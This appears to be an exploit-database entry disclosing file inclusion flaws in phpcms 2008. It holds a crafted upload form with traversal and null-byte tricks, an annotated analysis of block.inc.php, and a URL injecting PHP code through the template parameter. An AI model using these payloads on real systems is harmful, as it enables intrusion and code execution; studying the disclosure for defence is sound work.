Lucene search
+L

phpcms 2008多个文件包含漏洞

🗓️ 18 Jul 2012 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

This PHP application is vulnerable to multiple file inclusion attacks

Code

                                                <form id="frmUpload" enctype="multipart/form-data"
action="http://localhost/phpcms/yp/business/?file=../../admin/upload&C[upload_allowext]=php|Php%00.|php%00&dosubmit=yes" method="post">
<h1>Upload a new file:</h1>
<input type="file" name="uploadfile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
## 传完后我才发现attachment.class.php 里有黑名单,怎么绕大家结合环境利用吧。


## 漏洞再一次被鸡肋化了,哥继续找。 再次进入视线的是block.inc.php,看名字貌似是跟模块有关的,难不成可以写个shell ?
## 猫了个咪,打开文件我就想骂人了,做为admin目录下的文件,没有任何权限判断。
## 看144行左右,当$action 等于 post时。
case 'post':
	require_once 'template.func.php';
	if($func == 'dosave') ## 这里完全不用管他,让他进入else
	{
		$block->set_template($blockid, $template);
		$block->update($blockid, $data);
		$data = $block->get_html($blockid);
	}
	else
	{
		$name = new_stripslashes($name);
		$data = new_stripslashes($data);
		$data = $block->strip_data($data);
		$template = new_stripslashes($template);
		$tpldata = template_parse($template);
		$tplfile = TPL_CACHEPATH.'block_'.$blockid.'.preview.php'; 	## 文件名
		file_put_contents($tplfile, $tpldata); 						## 生成文件
		include $tplfile; 											## 包含文件
		@unlink($tplfile); 											## 删除刚才生成的文件
		$data = ob_get_contents();
		ob_clean();
	}
	echo '<script language="JavaScript">parent.'.$func.'('.$blockid.', "'.format_js($data, 0).'");</script>';
	break;

## 在这里可以生成一个php文件,并马上包含进来,随后又删除了。由于包含进来了,只要能控制php文件的内容,代码还是会被执行。
## 看取得文件内容的这一行,$tpldata = template_parse($template); 跟进template_parse函数
function template_parse($str, $istag = 0)
{
	$str = preg_replace("/([\n\r]+)\t+/s","\\1",$str);
	$str = preg_replace("/\<\!\-\-\{(.+?)\}\-\-\>/s", "{\\1}",$str);
	$str = preg_replace("/\{template\s+(.+)\}/","<?php include template(\\1); ?>",$str);
	$str = preg_replace("/\{include\s+(.+)\}/","<?php include \\1; ?>",$str);
	$str = preg_replace("/\{php\s+(.+)\}/","<?php \\1?>",$str);
	$str = preg_replace("/\{if\s+(.+?)\}/","<?php if(\\1) { ?>",$str);
	$str = preg_replace("/\{else\}/","<?php } else { ?>",$str);
	$str = preg_replace("/\{elseif\s+(.+?)\}/","<?php } elseif (\\1) { ?>",$str);
	$str = preg_replace("/\{\/if\}/","<?php } ?>",$str);
	$str = preg_replace("/\{loop\s+(\S+)\s+(\S+)\}/","<?php if(is_array(\\1)) foreach(\\1 AS \\2) { ?>",$str);
	$str = preg_replace("/\{loop\s+(\S+)\s+(\S+)\s+(\S+)\}/","<?php if(is_array(\\1)) foreach(\\1 AS \\2 => \\3) { ?>",$str);
	$str = preg_replace("/\{\/loop\}/","<?php } ?>",$str);
	$str = preg_replace("/\{\/get\}/","<?php } unset(\$DATA); ?>",$str);
	$str = preg_replace("/\{tag_([^}]+)\}/e", "get_tag('\\1')", $str);
	$str = preg_replace("/\{get\s+([^}]+)\}/e", "get_parse('\\1')", $str);
	$str = preg_replace("/\{([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff:]*\(([^{}]*)\))\}/","<?php echo \\1;?>",$str);
	$str = preg_replace("/\{\\$([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff:]*\(([^{}]*)\))\}/","<?php echo \\1;?>",$str);
	$str = preg_replace("/\{(\\$[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*)\}/","<?php echo \\1;?>",$str);
	$str = preg_replace("/\{(\\$[a-zA-Z0-9_\[\]\'\"\$\x7f-\xff]+)\}/es", "addquote('<?php echo \\1;?>')",$str);
	$str = preg_replace("/\{([A-Z_\x7f-\xff][A-Z0-9_\x7f-\xff]*)\}/s", "<?php echo \\1;?>",$str);
	if(!$istag) $str = "<?php defined('IN_PHPCMS') or exit('Access Denied'); ?>".$str;
	return $str;
}

## 是用来处理一些模板语法,完全不用理会。
EXP:http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation